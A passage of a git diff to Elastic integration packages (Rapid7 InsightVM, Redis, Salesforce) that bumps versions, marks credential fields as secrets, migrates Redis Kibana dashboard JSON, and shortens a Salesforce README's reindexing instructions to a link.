changes:
- description: Changed owners
diff --git a/packages/rapid7_insightvm/manifest.yml b/packages/rapid7_insightvm/manifest.yml
index 24b40573615..18678963c25 100644
--- a/packages/rapid7_insightvm/manifest.yml
+++ b/packages/rapid7_insightvm/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
name: rapid7_insightvm
title: Rapid7 InsightVM
-version: "1.8.2"
+version: "1.9.0"
source:
license: "Elastic-2.0"
description: Collect logs from Rapid7 InsightVM with Elastic Agent.
@@ -11,7 +11,7 @@ categories:
- vulnerability_management
conditions:
kibana:
- version: ^8.7.1
+ version: ^8.12.0
elastic:
subscription: "basic"
screenshots:
@@ -58,6 +58,7 @@ policy_templates:
multi: false
required: true
show_user: true
+ secret: true
- name: proxy_url
type: text
title: Proxy URL
diff --git a/packages/redis/changelog.yml b/packages/redis/changelog.yml
index 6c6295a19ba..9615577274e 100644
--- a/packages/redis/changelog.yml
+++ b/packages/redis/changelog.yml
@@ -1,4 +1,14 @@
# newer versions go on top
+- version: "1.14.0"
+ changes:
+ - description: Enable 'secret' for the sensitive fields.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9009
+- version: "1.13.1"
+ changes:
+ - description: Inline "by reference" visualizations
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9053
- version: "1.13.0"
changes:
- description: Update value format of "Top Slowest command" visualization.
diff --git a/packages/redis/data_stream/slowlog/manifest.yml b/packages/redis/data_stream/slowlog/manifest.yml
index 656954314ae..48592b5ddec 100644
--- a/packages/redis/data_stream/slowlog/manifest.yml
+++ b/packages/redis/data_stream/slowlog/manifest.yml @@ -14,6 +14,7 @@ streams: - name: password type: password title: Password + secret: true multi: false required: false show_user: false diff --git a/packages/redis/kibana/dashboard/redis-28969190-0511-11e9-9c60-d582a238e2c5.json b/packages/redis/kibana/dashboard/redis-28969190-0511-11e9-9c60-d582a238e2c5.json index d872f81e2d6..22ce123c4c9 100644 --- a/packages/redis/kibana/dashboard/redis-28969190-0511-11e9-9c60-d582a238e2c5.json +++ b/packages/redis/kibana/dashboard/redis-28969190-0511-11e9-9c60-d582a238e2c5.json @@ -1,8 +1,19 @@ { + "id": "redis-28969190-0511-11e9-9c60-d582a238e2c5", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:24:55.598Z", + "created_at": "2024-01-22T13:24:55.598Z", + "version": "WzEwNywxXQ==", "attributes": { "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", "controlStyle": "oneLine", + "chainingSystem": "HIERARCHICAL", "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", "panelsJSON": "{\"88495d21-6261-4c60-8de6-e9aa688b2085\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"title\":\"Keyspace\",\"fieldName\":\"redis.keyspace.id\",\"id\":\"88495d21-6261-4c60-8de6-e9aa688b2085\",\"selectedOptions\":[\"db0\",\"db1\"],\"enhancements\":{}}}}" }, @@ -59,6 +70,16 @@ }, "panelsJSON": [ { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "79fa7446-f3ce-466c-a4b5-bd4fde483e5d", + "w": 12, + "x": 0, + "y": 0 + }, + "panelIndex": "79fa7446-f3ce-466c-a4b5-bd4fde483e5d", "embeddableConfig": { "attributes": { "references": [ @@ -70,7 +91,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "9d7816a6-2ec8-4b54-aecf-ae00937afd79": { "columnOrder": [ 
@@ -190,21 +211,22 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Keys by type" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 15, - "i": "79fa7446-f3ce-466c-a4b5-bd4fde483e5d", - "w": 12, - "x": 0, + "i": "3199303d-19cf-430f-ab40-ac73f0ec9ea2", + "w": 36, + "x": 12, "y": 0 }, - "panelIndex": "79fa7446-f3ce-466c-a4b5-bd4fde483e5d", - "title": "Keys by type", - "type": "lens", - "version": "8.3.0" - }, - { + "panelIndex": "3199303d-19cf-430f-ab40-ac73f0ec9ea2", "embeddableConfig": { "attributes": { "references": [ @@ -221,7 +243,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "ab5b97a3-2883-46a9-8740-a9e19a13bc0d": { "columnOrder": [ @@ -369,21 +391,22 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Lists length" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 15, - "i": "3199303d-19cf-430f-ab40-ac73f0ec9ea2", - "w": 36, - "x": 12, - "y": 0 + "i": "161bf113-0b65-4f2c-ad1c-64f06c8b2344", + "w": 24, + "x": 0, + "y": 15 }, - "panelIndex": "3199303d-19cf-430f-ab40-ac73f0ec9ea2", - "title": "Lists length", - "type": "lens", - "version": "8.3.0" - }, - { + "panelIndex": "161bf113-0b65-4f2c-ad1c-64f06c8b2344", "embeddableConfig": { "attributes": { "references": [ @@ -400,7 +423,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "a99f131f-7844-46d3-801d-3023f3eb35d2": { "columnOrder": [ 
@@ -535,21 +558,22 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, + "title": "Average size of string keys" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 15, - "i": "161bf113-0b65-4f2c-ad1c-64f06c8b2344", + "i": "375cffab-4569-45e7-8848-c4464789a543", "w": 24, - "x": 0, + "x": 24, "y": 15 }, - "panelIndex": "161bf113-0b65-4f2c-ad1c-64f06c8b2344", - "title": "Average size of string keys", - "type": "lens", - "version": "8.3.0" - }, - { + "panelIndex": "375cffab-4569-45e7-8848-c4464789a543", "embeddableConfig": { "attributes": { "references": [ @@ -566,7 +590,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "93604465-9546-445d-8756-e2fe12469522": { "columnOrder": [ @@ -716,30 +740,16 @@ "visualizationType": "lnsXY" }, "enhancements": {}, - "hidePanelTitles": false + "hidePanelTitles": false, + "type": "lens" }, - "gridData": { - "h": 15, - "i": "375cffab-4569-45e7-8848-c4464789a543", - "w": 24, - "x": 24, - "y": 15 - }, - "panelIndex": "375cffab-4569-45e7-8848-c4464789a543", - "title": "Average keys TTL", - "type": "lens", - "version": "8.3.0" + "title": "Average keys TTL" } ], "timeRestore": false, "title": "[Metrics Redis] Keys", "version": 1 }, - "coreMigrationVersion": "8.3.0", - "id": "redis-28969190-0511-11e9-9c60-d582a238e2c5", - "migrationVersion": { - "dashboard": "8.3.0" - }, "references": [ { "id": "metrics-*", @@ -787,5 +797,7 @@ "type": "index-pattern" } ], - "type": "dashboard" + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/redis/kibana/dashboard/redis-7fea2930-478e-11e7-b1f0-cb29bac6bf8b.json b/packages/redis/kibana/dashboard/redis-7fea2930-478e-11e7-b1f0-cb29bac6bf8b.json index 7059e36e338..07717123064 100644 --- a/packages/redis/kibana/dashboard/redis-7fea2930-478e-11e7-b1f0-cb29bac6bf8b.json 
+++ b/packages/redis/kibana/dashboard/redis-7fea2930-478e-11e7-b1f0-cb29bac6bf8b.json @@ -1,4 +1,15 @@ { + "id": "redis-7fea2930-478e-11e7-b1f0-cb29bac6bf8b", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:24:55.598Z", + "created_at": "2024-01-22T13:24:55.598Z", + "version": "WzEwOCwxXQ==", "attributes": { "description": "Overview dashboard for the FIlebeat Redis integration", "kibanaSavedObjectMeta": { @@ -32,7 +43,45 @@ "@timestamp", "desc" ] - ] + ], + "attributes": { + "columns": [ + "host.name", + "log.level", + "redis.log.role", + "message" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\",\"key\":\"data_stream.dataset\",\"negate\":false,\"params\":{\"query\":\"redis.log\"},\"type\":\"phrase\"},\"query\":{\"match_phrase\":{\"data_stream.dataset\":\"redis.log\"}}}],\"highlightAll\":true,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"version\":true}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "Logs [Logs Redis]", + "version": 1, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 16, @@ -42,9 +91,8 @@ "y": 30 }, "panelIndex": "4", - "panelRefName": "panel_4", "type": "search", - "version": "8.10.2" + "version": "7.9.3" }, { "embeddableConfig": { 
@@ -55,7 +103,35 @@ "redis.slowlog.key" ], "enhancements": {}, - "sort": [] + "sort": [], + "attributes": { + "columns": [ + "host.name", + "message", + "redis.slowlog.duration.us", + "redis.slowlog.key" + ], + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": "{\"filter\":[],\"highlightAll\":true,\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"query\":{\"language\":\"kuery\",\"query\":\"data_stream.dataset:redis.slowlog\"},\"version\":true}" + }, + "sort": [ + [ + "@timestamp", + "desc" + ] + ], + "title": "Slow logs [Logs Redis]", + "version": 1, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ] + } }, "gridData": { "h": 16, @@ -65,9 +141,8 @@ "y": 0 }, "panelIndex": "6", - "panelRefName": "panel_6", "type": "search", - "version": "8.10.2" + "version": "7.9.3" }, { "embeddableConfig": { @@ -479,21 +554,7 @@ "title": "[Logs Redis] Overview", "version": 1 }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-23T06:52:58.334Z", - "id": "redis-7fea2930-478e-11e7-b1f0-cb29bac6bf8b", - "managed": false, "references": [ - { - "id": "redis-73613570-4791-11e7-be88-2ddb32f3df97", - "name": "4:panel_4", - "type": "search" - }, - { - "id": "redis-0ab87b80-478e-11e7-b1f0-cb29bac6bf8b", - "name": "6:panel_6", - "type": "search" - }, { "id": "logs-*", "name": "048af531-a2d5-4a14-b7d2-6156dce83cbc:indexpattern-datasource-layer-c0de1034-34c9-4f6a-b525-e39bd578cd2f", 
@@ -508,8 +569,29 @@ "id": "logs-*", "name": "5150d808-cfa0-4a30-ab6f-e9517fa2ceec:indexpattern-datasource-layer-ebb70b66-e024-4a14-b179-d15c72b605bf", "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": "4:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "4:kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "4:kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "6:kibanaSavedObjectMeta.searchSourceJSON.index", + "id": "logs-*" } ], - "type": "dashboard", + "managed": false, + "coreMigrationVersion": "8.8.0", "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/redis/kibana/dashboard/redis-AV4YjZ5pux-M-tCAunxK.json b/packages/redis/kibana/dashboard/redis-AV4YjZ5pux-M-tCAunxK.json index d4f7d5a1525..4d2ff1f06b5 100644 --- a/packages/redis/kibana/dashboard/redis-AV4YjZ5pux-M-tCAunxK.json +++ b/packages/redis/kibana/dashboard/redis-AV4YjZ5pux-M-tCAunxK.json @@ -1,4 +1,15 @@ { + "id": "redis-AV4YjZ5pux-M-tCAunxK", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.9.0" + }, + "updated_at": "2024-01-22T13:24:55.598Z", + "created_at": "2024-01-22T13:24:55.598Z", + "version": "WzEwOSwxXQ==", "attributes": { "description": "Overview of Redis server metrics", "hits": 0, @@ -18,6 +29,16 @@ }, "panelsJSON": [ { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "9587ad36-13de-4de0-8586-16065d55d029", + "w": 12, + "x": 0, + "y": 0 + }, + "panelIndex": "9587ad36-13de-4de0-8586-16065d55d029", "embeddableConfig": { "attributes": { "references": [ @@ -34,7 +55,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "42f14593-5da1-4fb7-adbc-aeb5e9a4e2cc": { "columnOrder": [ 
@@ -72,23 +93,24 @@ }, "title": "", "type": "lens", - "visualizationType": "lnsMetric" + "visualizationType": "lnsLegacyMetric" }, - "enhancements": {} + "enhancements": {}, + "type": "lens" }, + "title": "Clients [Metrics Redis]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 14, - "i": "9587ad36-13de-4de0-8586-16065d55d029", - "w": 12, - "x": 0, + "i": "452a1f6f-4931-4391-88bf-dfd23334b77b", + "w": 20, + "x": 12, "y": 0 }, - "panelIndex": "9587ad36-13de-4de0-8586-16065d55d029", - "title": "Clients [Metrics Redis]", - "type": "lens", - "version": "8.3.0" - }, - { + "panelIndex": "452a1f6f-4931-4391-88bf-dfd23334b77b", "embeddableConfig": { "attributes": { "references": [ @@ -105,7 +127,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "663fc5eb-ba63-4cb6-b9af-d996c9496392": { "columnOrder": [ @@ -208,21 +230,22 @@ "type": "lens", "visualizationType": "lnsXY" }, - "enhancements": {} + "enhancements": {}, + "type": "lens" }, + "title": "Connected clients [Metrics Redis]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 14, - "i": "452a1f6f-4931-4391-88bf-dfd23334b77b", - "w": 20, - "x": 12, + "i": "6ceb010f-3be5-402d-a4cf-42f52a01d0db", + "w": 16, + "x": 32, "y": 0 }, - "panelIndex": "452a1f6f-4931-4391-88bf-dfd23334b77b", - "title": "Connected clients [Metrics Redis]", - "type": "lens", - "version": "8.3.0" - }, - { + "panelIndex": "6ceb010f-3be5-402d-a4cf-42f52a01d0db", "embeddableConfig": { "attributes": { "references": [ @@ -234,7 +257,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "4b781053-c878-4b17-9517-9dbd0482b634": { "columnOrder": [ 
@@ -343,21 +366,22 @@ "type": "lens", "visualizationType": "lnsXY" }, - "enhancements": {} + "enhancements": {}, + "type": "lens" }, - "gridData": { - "h": 14, - "i": "6ceb010f-3be5-402d-a4cf-42f52a01d0db", - "w": 16, - "x": 32, - "y": 0 - }, - "panelIndex": "6ceb010f-3be5-402d-a4cf-42f52a01d0db", - "title": "Keyspaces [Metrics Redis]", - "type": "lens", - "version": "8.3.0" + "title": "Keyspaces [Metrics Redis]" }, { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 8, + "i": "e38aacc7-f856-4306-86d2-3746d0143d6a", + "w": 48, + "x": 0, + "y": 14 + }, + "panelIndex": "e38aacc7-f856-4306-86d2-3746d0143d6a", "embeddableConfig": { "attributes": { "references": [ @@ -369,7 +393,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "0af489b3-738e-40c0-9ae4-43dd70bf9fed": { "columnOrder": [ @@ -518,21 +542,22 @@ "type": "lens", "visualizationType": "lnsDatatable" }, - "enhancements": {} + "enhancements": {}, + "type": "lens" }, + "title": "Hosts [Metrics Redis]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 8, - "i": "e38aacc7-f856-4306-86d2-3746d0143d6a", - "w": 48, + "i": "e59f5a8f-6f47-471c-bf7c-96d6eab6baf3", + "w": 16, "x": 0, - "y": 14 + "y": 22 }, - "panelIndex": "e38aacc7-f856-4306-86d2-3746d0143d6a", - "title": "Hosts [Metrics Redis]", - "type": "lens", - "version": "8.3.0" - }, - { + "panelIndex": "e59f5a8f-6f47-471c-bf7c-96d6eab6baf3", "embeddableConfig": { "attributes": { "references": [ @@ -549,7 +574,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "495b0b3d-5f1c-49b0-ac9b-788f6f4d2b06": { "columnOrder": [ 
@@ -600,16 +625,18 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "d32bf426-f3bf-43f9-a1f6-825c2ac9cd5a" - ], "layerId": "495b0b3d-5f1c-49b0-ac9b-788f6f4d2b06", "layerType": "data", "legendDisplay": "show", "legendSize": "auto", - "metric": "3996a38e-2cff-4888-b0cc-234ec8debdf8", "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "d32bf426-f3bf-43f9-a1f6-825c2ac9cd5a" + ], + "metrics": [ + "3996a38e-2cff-4888-b0cc-234ec8debdf8" + ] } ], "palette": { @@ -623,21 +650,22 @@ "type": "lens", "visualizationType": "lnsPie" }, - "enhancements": {} + "enhancements": {}, + "type": "lens" }, + "title": "Server Versions [Metrics Redis]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 8, - "i": "e59f5a8f-6f47-471c-bf7c-96d6eab6baf3", + "i": "989efbbc-7d45-466c-8bb3-9322a6fa6a46", "w": 16, - "x": 0, + "x": 16, "y": 22 }, - "panelIndex": "e59f5a8f-6f47-471c-bf7c-96d6eab6baf3", - "title": "Server Versions [Metrics Redis]", - "type": "lens", - "version": "8.3.0" - }, - { + "panelIndex": "989efbbc-7d45-466c-8bb3-9322a6fa6a46", "embeddableConfig": { "attributes": { "references": [ @@ -654,7 +682,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "88f523d4-adf4-423a-9a09-a6ae74f410ff": { "columnOrder": [ @@ -705,16 +733,18 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "a60e9838-ac8c-440d-b42f-07cc81d2694c" - ], "layerId": "88f523d4-adf4-423a-9a09-a6ae74f410ff", "layerType": "data", "legendDisplay": "show", "legendSize": "auto", - "metric": "3f54a1a9-ff71-44a3-80f5-f16d7db12c58", "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "a60e9838-ac8c-440d-b42f-07cc81d2694c" + ], + "metrics": [ + "3f54a1a9-ff71-44a3-80f5-f16d7db12c58" + ] } ], "palette": { 
@@ -728,21 +758,22 @@ "type": "lens", "visualizationType": "lnsPie" }, - "enhancements": {} + "enhancements": {}, + "type": "lens" }, + "title": "Server mode [Metrics Redis]" + }, + { + "version": "8.9.0", + "type": "lens", "gridData": { "h": 8, - "i": "989efbbc-7d45-466c-8bb3-9322a6fa6a46", + "i": "eed90cad-e313-4af5-b26b-965cfc02ea24", "w": 16, - "x": 16, + "x": 32, "y": 22 }, - "panelIndex": "989efbbc-7d45-466c-8bb3-9322a6fa6a46", - "title": "Server mode [Metrics Redis]", - "type": "lens", - "version": "8.3.0" - }, - { + "panelIndex": "eed90cad-e313-4af5-b26b-965cfc02ea24", "embeddableConfig": { "attributes": { "references": [ @@ -759,7 +790,7 @@ ], "state": { "datasourceStates": { - "indexpattern": { + "formBased": { "layers": { "7dd18b64-cbba-40ed-b1e3-56aa0f27f3f3": { "columnOrder": [ @@ -810,16 +841,18 @@ "layers": [ { "categoryDisplay": "default", - "groups": [ - "cfccf32e-014a-43c4-b8f5-7bcc29ce6e46" - ], "layerId": "7dd18b64-cbba-40ed-b1e3-56aa0f27f3f3", "layerType": "data", "legendDisplay": "show", "legendSize": "auto", - "metric": "a2c1d752-9b78-45b8-ae86-f71e48c5fee1", "nestedLegend": false, - "numberDisplay": "percent" + "numberDisplay": "percent", + "primaryGroups": [ + "cfccf32e-014a-43c4-b8f5-7bcc29ce6e46" + ], + "metrics": [ + "a2c1d752-9b78-45b8-ae86-f71e48c5fee1" + ] } ], "palette": { @@ -833,30 +866,16 @@ "type": "lens", "visualizationType": "lnsPie" }, - "enhancements": {} + "enhancements": {}, + "type": "lens" }, - "gridData": { - "h": 8, - "i": "eed90cad-e313-4af5-b26b-965cfc02ea24", - "w": 16, - "x": 32, - "y": 22 - }, - "panelIndex": "eed90cad-e313-4af5-b26b-965cfc02ea24", - "title": "Multiplexing API [Metrics Redis]", - "type": "lens", - "version": "8.3.0" + "title": "Multiplexing API [Metrics Redis]" } ], "timeRestore": false, "title": "[Metrics Redis] Overview", "version": 1 }, - "coreMigrationVersion": "8.3.0", - "id": "redis-AV4YjZ5pux-M-tCAunxK", - "migrationVersion": { - "dashboard": "8.3.0" - }, "references": [ { "id": "metrics-*", 
@@ -919,5 +938,7 @@ "type": "index-pattern" } ], - "type": "dashboard" + "managed": false, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/redis/kibana/search/redis-0ab87b80-478e-11e7-b1f0-cb29bac6bf8b.json b/packages/redis/kibana/search/redis-0ab87b80-478e-11e7-b1f0-cb29bac6bf8b.json deleted file mode 100644 index 22115ed4d52..00000000000 --- a/packages/redis/kibana/search/redis-0ab87b80-478e-11e7-b1f0-cb29bac6bf8b.json +++ /dev/null @@ -1,45 +0,0 @@ -{ - "attributes": { - "columns": [ - "host.name", - "message", - "redis.slowlog.duration.us", - "redis.slowlog.key" - ], - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "highlightAll": true, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", - "query": { - "language": "kuery", - "query": "data_stream.dataset:redis.slowlog" - }, - "version": true - } - }, - "sort": [ - [ - "@timestamp", - "desc" - ] - ], - "title": "Slow logs [Logs Redis]", - "version": 1 - }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-23T06:20:05.818Z", - "id": "redis-0ab87b80-478e-11e7-b1f0-cb29bac6bf8b", - "managed": true, - "references": [ - { - "id": "logs-*", - "name": "kibanaSavedObjectMeta.searchSourceJSON.index", - "type": "index-pattern" - } - ], - "type": "search", - "typeMigrationVersion": "8.0.0" -} \ No newline at end of file diff --git a/packages/redis/manifest.yml b/packages/redis/manifest.yml index 1bf0446ef23..e93a6b76af9 100644 --- a/packages/redis/manifest.yml +++ b/packages/redis/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: redis title: Redis -version: "1.13.0" +version: "1.14.0" description: Collect logs and metrics from Redis servers with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - observability conditions: kibana: - version: "^8.10.2" + version: "^8.12.0" elastic: subscription: basic screenshots: 
@@ -75,6 +75,7 @@ policy_templates:
- name: password
type: password
title: Password
+ secret: true
multi: false
required: false
show_user: false
diff --git a/packages/salesforce/_dev/build/docs/README.md b/packages/salesforce/_dev/build/docs/README.md
index 4caa956ba46..2d7b27e94df 100644
--- a/packages/salesforce/_dev/build/docs/README.md
+++ b/packages/salesforce/_dev/build/docs/README.md
@@ -188,91 +188,7 @@ If the error continues follow these steps: ### Missing old events in **Login events table** panel -If **Login events table** does not display older documents after upgrading to ``0.8.0`` or later versions, then this issue can be solved by reindexing the ``login_rest`` data stream's indices. - -To reindex the data, the following steps must be performed. - -1. Stop the data stream by going to `Integrations -> Salesforce -> Integration policies` open the configuration of Salesforce and disable the `Salesforce Login logs` toggle to reindex ``login_rest`` data stream and save the integration. - -2. Copy data into the temporary index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-salesforce.login_rest-default" - }, - "dest": { - "index": "temp_index" - } -} -``` - -3. Delete the existing data stream and index template by performing the following steps in the Dev tools. - -``` -DELETE /_data_stream/ -DELETE _index_template/ -``` -Example: -``` -DELETE /_data_stream/logs-salesforce.login_rest-default -DELETE _index_template/logs-salesforce.login_rest -``` - -4. Go to `Integrations -> Salesforce -> Settings` and click on `Reinstall Salesforce`. - -5. Copy data from temporary index to new index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-salesforce.login_rest-default", - "op_type": "create" - } -} -``` - -6. Verify data is reindexed completely. - -7. Start the data stream by going to the `Integrations -> Salesforce -> Integration policies` and open configuration of integration and enable the `Salesforce Login logs` toggle. - -8. 
Delete temporary index by performing the following step in the Dev tools. - -``` -DELETE temp_index -``` - -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +If **Login events table** does not display older documents after upgrading to ``0.8.0`` or later versions, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``login_rest`` data stream. ## Logs reference diff --git a/packages/salesforce/changelog.yml b/packages/salesforce/changelog.yml index 65c98a80709..428fcb7c8c8 100644 --- a/packages/salesforce/changelog.yml +++ b/packages/salesforce/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "0.14.1" + changes: + - description: Update README with reindexing steps. + type: enhancement + link: https://github.com/elastic/integrations/pull/9529 +- version: 0.14.0 + changes: + - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values + type: enhancement + link: https://github.com/elastic/integrations/pull/9321 +- version: "0.13.1" + changes: + - description: Disable secrets for older stack versions due to errors. + type: bugfix + link: https://github.com/elastic/integrations/pull/9279 +- version: "0.13.0" + changes: + - description: Enable 'secret' for the sensitive fields, supported from 8.12. + type: enhancement + link: https://github.com/elastic/integrations/pull/9009 - version: "0.12.1" changes: - description: Add null and ignore_missing check to handle event.original field. diff --git a/packages/salesforce/docs/README.md b/packages/salesforce/docs/README.md index 89e8145df5c..d9633ca1470 100644 --- a/packages/salesforce/docs/README.md +++ b/packages/salesforce/docs/README.md 
@@ -188,91 +188,7 @@ If the error continues follow these steps: ### Missing old events in **Login events table** panel -If **Login events table** does not display older documents after upgrading to ``0.8.0`` or later versions, then this issue can be solved by reindexing the ``login_rest`` data stream's indices. - -To reindex the data, the following steps must be performed. - -1. Stop the data stream by going to `Integrations -> Salesforce -> Integration policies` open the configuration of Salesforce and disable the `Salesforce Login logs` toggle to reindex ``login_rest`` data stream and save the integration. - -2. Copy data into the temporary index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "source": { - "index": "" - }, - "dest": { - "index": "temp_index" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "logs-salesforce.login_rest-default" - }, - "dest": { - "index": "temp_index" - } -} -``` - -3. Delete the existing data stream and index template by performing the following steps in the Dev tools. - -``` -DELETE /_data_stream/ -DELETE _index_template/ -``` -Example: -``` -DELETE /_data_stream/logs-salesforce.login_rest-default -DELETE _index_template/logs-salesforce.login_rest -``` - -4. Go to `Integrations -> Salesforce -> Settings` and click on `Reinstall Salesforce`. - -5. Copy data from temporary index to new index by performing the following steps in the Dev tools. - -``` -POST _reindex -{ - "source": { - "index": "temp_index" - }, - "dest": { - "index": "", - "op_type": "create" - } -} -``` -Example: -``` -POST _reindex -{ - "source": { - "index": "temp_index" - }, - "dest": { - "index": "logs-salesforce.login_rest-default", - "op_type": "create" - } -} -``` - -6. Verify data is reindexed completely. - -7. Start the data stream by going to the `Integrations -> Salesforce -> Integration policies` and open configuration of integration and enable the `Salesforce Login logs` toggle. - -8. 
Delete temporary index by performing the following step in the Dev tools. - -``` -DELETE temp_index -``` - -More details about reindexing can be found [here](https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-reindex.html). +If **Login events table** does not display older documents after upgrading to ``0.8.0`` or later versions, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``login_rest`` data stream. ## Logs reference diff --git a/packages/salesforce/manifest.yml b/packages/salesforce/manifest.yml index 80786f71851..ef124ab7692 100644 --- a/packages/salesforce/manifest.yml +++ b/packages/salesforce/manifest.yml @@ -1,7 +1,7 @@ -format_version: 3.0.0 +format_version: 3.0.2 name: salesforce title: Salesforce -version: "0.12.1" +version: "0.14.1" description: Collect logs from Salesforce with Elastic Agent. type: integration categories: @@ -10,7 +10,7 @@ conditions: elastic: subscription: basic kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/salesforce-login.png title: Salesforce Login Dashboard @@ -53,6 +53,7 @@ vars: title: Client Secret description: OAuth 2.0 client secret. required: true + secret: true show_user: true default: client_secret - name: username @@ -65,6 +66,7 @@ vars: - name: password type: password title: Password + secret: true description: The password used as part of the authentication flow. required: true show_user: true @@ -72,6 +74,7 @@ vars: - name: token_url type: text title: Token URL + secret: false description: The OAuth 2.0 token URL for Salesforce. required: true show_user: false diff --git a/packages/santa/_dev/deploy/docker/sample_logs/santa.log b/packages/santa/_dev/deploy/docker/sample_logs/santa.log index 